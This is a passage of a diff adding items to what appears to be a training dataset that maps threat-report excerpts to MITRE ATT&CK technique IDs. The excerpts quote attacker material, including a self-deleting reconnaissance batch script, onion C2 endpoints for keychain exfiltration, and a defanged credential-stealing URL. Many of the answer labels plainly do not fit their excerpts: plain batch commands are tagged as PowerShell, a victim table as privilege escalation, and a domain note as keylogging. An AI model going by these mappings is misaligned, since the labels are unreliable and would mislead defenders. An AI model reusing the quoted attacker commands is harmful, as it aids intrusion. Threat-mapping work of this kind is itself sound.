will call a function that is responsible for decompressing a blob of data", + "output": "- T1005: Data from Local System\n- T1083: File and Directory Discovery\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"We observed the threat group issue the following commands: @echo off\u00a0 \u00a0dir c:\\ >> %temp%\\download\u00a0 \u00a0ipconfig /all >> %temp%\\download\u00a0 \u00a0net user >> %temp%\\download\u00a0 \u00a0net user /domain >> %temp%\\download\u00a0 \u00a0ver >> %temp%\\download\u00a0 \u00a0del %0\u00a0\u00a0 @echo off\u00a0 \u00a0dir \"\"c:\\Documents and Settings\"\" >> %temp%\\download\u00a0 \u00a0dir \"\"c:\\Program Files\\\u00a0 \u00a0\"\" >> %temp%\\download\u00a0 \u00a0net start >> %temp%\\download\u00a0 \u00a0net localgroup administrator >> %temp%\\download\u00a0 \u00a0netstat -ano >> %temp%\\download These commands allow the threat group to gain information about the compromised computer and the network to which it belongs\"", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1007: System Service Discovery\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We\u2019ve seen two onion addresses used in different samples: g5wcesdfjzne7255.onion (Down) r2elajikcosf7zee.onion (Alive at time of writing) The HTTP resource always starts with /api/osx/ and contains actions such as: /api/osx/started to report the bot has just started /api/osx/keychain to exfiltrate the content of the keychain /api/osx/get_task?bot_id={botid}&version={version} to request a task (described below) /api/osx/cmd_executed to report a the output of a command that was executed /api/osx/task_complete?bot_id={botid}&task_id={taskid} to report a task was completed HTTP POST content has two fields: bot_id and data", + "output": "- T1071: Application Layer Protocol\n- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order", + "output": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When comparing the provided timestamps of the delivery documents to the timestamps for the remote template documents from Table 2, we find that the time to attack is directly correlated to the last time the templates are modified", + "output": "- T1070.006: Indicator Removal - Timestomp\n- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named \u201cvmtoolsd.\u201d Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name \u2018MSASCuiLTasks\u2019 in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence", + "output": "- T1057: Process Discovery\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When generating the URL for the HTTP requests issued to the C2 server, the Trojan chooses a random folder from the following to include within the URL path: watch/? search/? find/? results/? open/? search/? close/? XAgent also will choose several parameters names from the following list when finishing the construction of the C2 URL: itwm= text= from=", + "output": "- T1071: Application Layer Protocol\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When one PlugX succeeds to infect a host, it then accesses to every IP address in the local network one-by-one and communicate with any connectable nodes, using one of the following protocols listed in Table 2", + "output": "- T1016: System Network Configuration Discovery\n- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When the actor modifies the file and changes the modification_time, the Trojan downloads the contents from the file by creating an HTTP request to a URL structured as follows: + + \u201c?alt=media\u201d The Trojan processes the downloaded data within the file the same way it would to obtain a job from data received from the DNS tunneling channel using the TXT query mode, specifically by searching the data using the following regular expression: ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\/=]+).(||) The Trojan function splits the matching data, specifically the subdomain on a separator that is a character between r and v and uses the data before the separator to get the sequence number and a Boolean value (0 or 1) if more data is expected", + "output": "- T1048: Exfiltration Over Alternative Protocol\n- T1074: Data Staged\n- T1486: Data Encrypted for Impact\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries.Following these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts.As with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"\"for educational purposes,\"\" malicious attackers have been continuously leveraging it against various targets around the world.Distribution campaignsFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger/stealer\"", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Year Country Industry Malware 2014 Vietnam Network Security WINDSHIELD 2014 Germany Manufacturing WINDSHIELD 2015 Vietnam Media WINDSHIELD 2016 Philippines Consumer products KOMPROGO WINDSHIELD SOUNDBITE BEACON \u00a0 2016 Vietnam Banking WINDSHIELD 2016 Philippines Technology Infrastructure WINDSHIELD 2016 China Hospitality WINDSHIELD 2016 Vietnam Media WINDSHIELD 2016 United States Consumer Products WINDSHIELD PHOREAL BEACON SOUNDBITE Table 1: APT32 Private Sector Targeting Identified by FireEye APT32 Interest in Political Influence and Foreign Governments In addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\u0627\u0633\u062a\u0637\u0644\u0627\u0639.docx https://0utl00k[.]net/docs Table 1 Additional DarkHydrus Word documents used to steal credentials Both of these related documents use the attachedTemplate technique to steal credentials by sending them to a URL https://0utl00k[.]net/docs", + "output": "- T1003: OS Credential Dumping\n- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The command processing function starts by substituting the main module name and path in the hosting process PEB, with the one of the default internet browser. The path of the main browser of the workstation is obtained by reading the registry value", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Along the way, HermeticWiper\u2019s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver\u2019s execution starts", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document", + "output": "- T1584.004: Compromise Infrastructure - Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additionally, the IP 211[.]72 [.]242[.]120 is one of the hosts for the domain microsoftmse[.]com, which has been used by several KIVARS variants", + "output": "- T1113: Screen Capture\n- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"When communicating with its C2 server, Psylo will use HTTPS with a unique user-agent of (notice the lack of a space between \"\"5.0\"\" and \"\"(Windows\"", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS", + "output": "- T1218.005: System Binary Proxy Execution - Mshta\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "dlpumgr32.exe, a legitimate signed file that belongs to the DESlock+ product - DLPPREM32.DLL, a malicious DLL sideloaded by dlpumgr32.exe that loads and decodes DLPPREM32.bin - DLPPREM32.bin, a shellcode that decompresses and loads a launcher in memory - data.res, an encrypted file decoded by the launcher and contains two SysUpdate versions: one for a 32-bit architecture and another for a 64-bit architecture - config.res, an encrypted file decoded by the launcher and contains the SysUpdate configuration, such as the command-and-control (C&C) address", + "output": "- T1082: System Information Discovery\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The size of the image is more than 600KB and embedded in it is the encrypted IcedID main module. The encryption algorithm is RC4 and the keys are also embedded in the image at specific offset", + "output": "- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account", + "output": "- T1583.006: Acquire Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While Kimsuky is very active, the KONNI RAT has also been upgraded to a more evasive piece of malware", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This will also force the victim to re-open the browser using the newly written .lnk file, which is now loaded with Grandoreiro\u2019s malicious extension. This extension will load on every browser startup using this specific .lnk file", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. Anatomy of the Attack For a number of years targeted attacks have nearly always followed the same modus operandi. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"\"%HOMEDRIVE%\\Windows\"\" directory. It also only wipes files that have specific file extensions\"", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Registry traversal for Putty data exfiltration (left), code showing hostname, username and Private Key Files (right", + "output": "- T1552.002: Unsecured Credentials - Credentials in Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One interesting thing to note is that the Keybase account used by the attacker to chat with their victims has the same logo of the Pay2Key EOSIO smart contract system", + "output": "- T1585: Establish Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The LNK file contains a list of commands that will be executed upon running, and a blob that is a base64 encoded compressed payload", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fourth, this Darkhotel event is not based on the network protocol C2, but based on a custom file transfer control instruction", + "output": "- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation", + "output": "- T1047: Windows Management Instrumentation\n- T1218.005: System Binary Proxy Execution - Mshta\n- T1027: Obfuscated Files or Information\n- T1559.001: Inter-Process Communication - Component Object Model" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g. username>@<email domain>. While usernames for legitimate logins at the victim\u2019s network were generally formatted like <domain>\\<username>. And attempted logins came from a relative small set of IP-addresses", + "output": "- T1016: System Network Configuration Discovery\n- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets. If the victims use iTunes to backup files from iPhone to Mac (can be via Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers (Figure 5", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The JavaScript component is the first stage of the attack and can deploy other malware such as a C# spy component, Golden Chickens components or several Python-based tools. The name Evilnum was given to the C# component by other researchers in the past, but the JS component also has been referred to as Evilnum. We have named the group Evilnum as that is the name of their flagship malware, and we\u2019ll refer to the various malware pieces as components", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "But Ryuk isn\u2019t new to us\u2026 we\u2019ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)\u2014especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including \u201cWIZARD SPIDER,\u201d \u201cUNC1878,\u201d and \u201cTeam9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others", + "output": "- T1047: Windows Management Instrumentation\n- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat intelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples themselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. Strangely, in one case, the threat actors also appear to have used a domain name similar to the Foreign Policy Research Institute (FPRI) in a message purporting to be from CFR. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. Its called the \"\"packager trick\"\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to 